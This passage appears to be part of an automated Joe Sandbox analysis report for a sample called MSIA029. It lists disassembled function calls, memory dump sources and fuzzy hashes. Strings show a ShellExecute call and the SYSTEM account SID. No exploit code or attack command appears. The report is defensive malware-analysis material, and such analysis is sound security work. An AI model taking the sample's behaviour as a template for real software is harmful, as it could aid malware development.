                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42A92
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42A9C
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F42AD6
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42AED
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42B0D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  • Opcode ID: 81d3e2c4038ec22f5e46ad340f6d8eea53e6cd350afef3c64ecfa704b04a3064
                                                                                                                                                                                                                                                  • Instruction ID: 834fc202669dd32b31d659a519762b42608f331e6528535959f4e4bf5d300d4e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81d3e2c4038ec22f5e46ad340f6d8eea53e6cd350afef3c64ecfa704b04a3064
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF01C031900619DFCB15FB649C41ABE7BA1AF84760F244819FE04AB2D2CF789E05EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42B27
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42B31
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F42B6B
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42B82
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42BA2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  • Opcode ID: 76988b67e4eed8058e6a3856c7fca6d6ca02cab3b2b1f981ba7b3bac503e3aed
                                                                                                                                                                                                                                                  • Instruction ID: a2cdcb8d32d5493a3e35792572cd0b1e15385bb6ee44fb9f8c29c57560444de1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76988b67e4eed8058e6a3856c7fca6d6ca02cab3b2b1f981ba7b3bac503e3aed
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D01C035900619DBCB15EB648C416BE7B71BF84730F250419F9046B3D2CFB89E05EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4EB33
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EB3D
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F4EB77
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4EB8E
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EBAE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  • Opcode ID: 0f7ea4dd7a15a73f1f115e170cddee11103ec7e877b21c703563dd99323bea5b
                                                                                                                                                                                                                                                  • Instruction ID: 829ee2d2ffada055fc4b3635ea8e59731646f7b94978080332f4cba09924a5f7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f7ea4dd7a15a73f1f115e170cddee11103ec7e877b21c703563dd99323bea5b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B401C031900619DFCB05FB64DC816BE7B60BF84720F250809F9156B2D2CF789E05AB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42D7B
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42D85
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • numpunct.LIBCPMT ref: 00F42DBF
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42DD6
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42DF6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 743221004-0
                                                                                                                                                                                                                                                  • Opcode ID: aefaed08abefdd302769745351384ee1b149a6b855a67890bb8581cab3b0e9a4
                                                                                                                                                                                                                                                  • Instruction ID: 195e94bb535abc7bf1ba1e108e06cbb10ba6e26959df14583be27ebe6be3c4ca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aefaed08abefdd302769745351384ee1b149a6b855a67890bb8581cab3b0e9a4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E601C031D00219DBCB05EBA4DC416BEBBB0BF84720F650819F914AB2D2DF789E01BB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                                                                                                  • RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,00F32427,00F8E638,00F76B40), ref: 00F52D0C
                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(?,00F32427,00F8E638,00F76B40), ref: 00F52D18
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3916383385-0
                                                                                                                                                                                                                                                  • Opcode ID: 97d720923773ec33fda3d0c37d3799586f98b0e4defc01b07b26218c6b11d453
                                                                                                                                                                                                                                                  • Instruction ID: c7aaa777f6d77da126810d25d0f6d3a47c55f80c20f21c35eeb58f6650cdb740
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97d720923773ec33fda3d0c37d3799586f98b0e4defc01b07b26218c6b11d453
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27014632A14228DFC715AF18FC08AE9BB65FF49761701446AF90683371DB705841FBA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000018,80A20388,?,00000000), ref: 00F3BBA3
                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00F3BD7F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                  • API String ID: 3924972193-2658103896
                                                                                                                                                                                                                                                  • Opcode ID: fcc815dcfce025b0a2f8a4867284399b36f77781de8e818b97f52e26d0af3f13
                                                                                                                                                                                                                                                  • Instruction ID: 8097593466c97d7ecc3d4fe3eebd3df81133666125712f20d003a04083560838
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcc815dcfce025b0a2f8a4867284399b36f77781de8e818b97f52e26d0af3f13
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D61B1B1D00348DBDB10DFA4C841BDEBBF4FF04714F14825AE945AB281E7B5AA48DB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4D3D2
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F4D46E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                  • String ID: %.0Lf$0123456789-
                                                                                                                                                                                                                                                  • API String ID: 2544715827-3094241602
                                                                                                                                                                                                                                                  • Opcode ID: 69683604d087903467f3edd6d7ac93ae35d9a2c13da435c6fe35bdaf637c2be3
                                                                                                                                                                                                                                                  • Instruction ID: 5c828320d91768ed27cd11f6602ce064b801a66da33e6000a09ea7e597a69e25
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69683604d087903467f3edd6d7ac93ae35d9a2c13da435c6fe35bdaf637c2be3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01413A31900218DFCF15DFA8C880ADDBFB5BF08314F144159E905AB265DB74AA56EBA2
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4D676
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F4D712
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                  • String ID: 0123456789-$0123456789-
                                                                                                                                                                                                                                                  • API String ID: 3042121994-2494171821
                                                                                                                                                                                                                                                  • Opcode ID: c5026e49f917b25b20903b1861fc64163d45e7d215ddb6d02df505a3a87caf49
                                                                                                                                                                                                                                                  • Instruction ID: 6783ba5bf4f3ee914da54a4b3c103e6b63371ff609f9d493818ccd77d5ba45a9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5026e49f917b25b20903b1861fc64163d45e7d215ddb6d02df505a3a87caf49
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03415B71900218DFCF15EFA8CC80ADE7FB5BF08320F140159E915AB255DB34DA56EB92
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F51761
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F517FB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                  • String ID: 0123456789-$0123456789-
                                                                                                                                                                                                                                                  • API String ID: 3042121994-2494171821
                                                                                                                                                                                                                                                  • Opcode ID: 27f7c835d171a199d0f042743ebe58a30f6c6798dc8101efd9cd38ef720cfe0f
                                                                                                                                                                                                                                                  • Instruction ID: cecde9125e7e3cfa0a36df8de3dc3db020ab7bbfd15ee8bb21767f96f719afc4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27f7c835d171a199d0f042743ebe58a30f6c6798dc8101efd9cd38ef720cfe0f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20416031900209EFCF15DFA8D881A9EBBB5FF04311F10415AF911AB252DB78EA56EB91
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4838D
                                                                                                                                                                                                                                                    • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C62
                                                                                                                                                                                                                                                    • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C7F
                                                                                                                                                                                                                                                    • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C9C
                                                                                                                                                                                                                                                    • Part of subcall function 00F41C42: _Maklocchr.LIBCPMT ref: 00F41CAE
                                                                                                                                                                                                                                                    • Part of subcall function 00F41C42: _Maklocchr.LIBCPMT ref: 00F41CC1
                                                                                                                                                                                                                                                  • _Mpunct.LIBCPMT ref: 00F4841A
                                                                                                                                                                                                                                                  • _Mpunct.LIBCPMT ref: 00F48434
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                                                                                                                                  • String ID: $+xv
                                                                                                                                                                                                                                                  • API String ID: 2939335142-1686923651
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Mpunct$H_prolog3
                                                                                                                                                                                                                                                  • String ID: $+xv
                                                                                                                                                                                                                                                  • API String ID: 4281374311-1686923651
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00F31434,?,00000000), ref: 00F32569
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00F31434,?,00000000), ref: 00F32589
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00F31434,?,00000000), ref: 00F325DF
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,80A20388,?,00000000,00F73C40,000000FF,00000008,?,?,?,?,00F31434,?,00000000), ref: 00F32633
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,80A20388,?,00000000,00F73C40,000000FF,00000008,?,?,?,?,00F31434), ref: 00F32647
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocFree$CloseHandle
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1291444452-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(80A20388,?,00000000,?), ref: 00F71DFE
                                                                                                                                                                                                                                                    • Part of subcall function 00F6A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F66F5E,?,00000000,-00000008), ref: 00F6AA67
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F72059
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F720A1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00F72144
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2112829910-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 838279627-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 838279627-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00F36FB7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                  • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                                                                                                                                  • API String ID: 1452528299-1781106413
                                                                                                                                                                                                                                                  APIs
